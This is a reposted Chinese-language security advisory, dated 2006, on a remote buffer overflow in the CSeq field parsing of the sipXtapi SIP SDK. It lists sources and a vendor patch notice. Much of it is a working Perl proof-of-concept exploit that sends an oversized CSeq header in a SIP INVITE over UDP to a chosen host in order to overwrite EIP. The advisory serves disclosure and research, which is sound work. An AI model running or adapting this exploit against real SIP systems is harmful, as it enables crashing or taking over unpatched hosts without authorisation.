[转载]SIPfoundry SIPXtapi CSeq处理远程溢出漏洞
信息来源:绿盟科技发布日期:2006-07-10
更新日期:2006-07-11
受影响系统:
SIP Foundry SipXtapi
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 18906
sipXtapi是一个简单易用的软件开发工具包(SDK),用于开发各种单机或集成的SIP客户端。
sipXtapi库在解析CSeq字段时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
远程攻击者可以通过发送大于24个字节的CSeq字段触发这个漏洞,导致控制EIP,执行任意代码。
<*来源:Michael Thumann ([email]mthumann@ernw.de[/email])
链接:[url]http://secunia.com/advisories/20997/print/[/url]
[url]http://marc.theaimsgroup.com/?l=bugtraq&m=115255370208995&w=2[/url]
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
# PoC Exploit By [email]mthumann@ernw.de[/email]
# Remote Buffer Overflow in sipXtapi
use IO::Socket;
#use strict;
print "sipXtapi Exploit by Michael Thumann \n\n";
if (not $ARGV[0]) {
print "Usage: sipx.pl <host>\n";
exit;}
$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =<<END;
INVITE sip:user\@$source SIP/2.0\r
To: <sip:$target:$target_port>\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"<sip:$target:3277>\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: <sip:$source:5059>\r
\r
END
print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
print "Done.\n";
建议:
--------------------------------------------------------------------------------
厂商补丁:
SIP Foundry
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
[url]http://www.sipfoundry.org/index.html[/url]
页:
[1]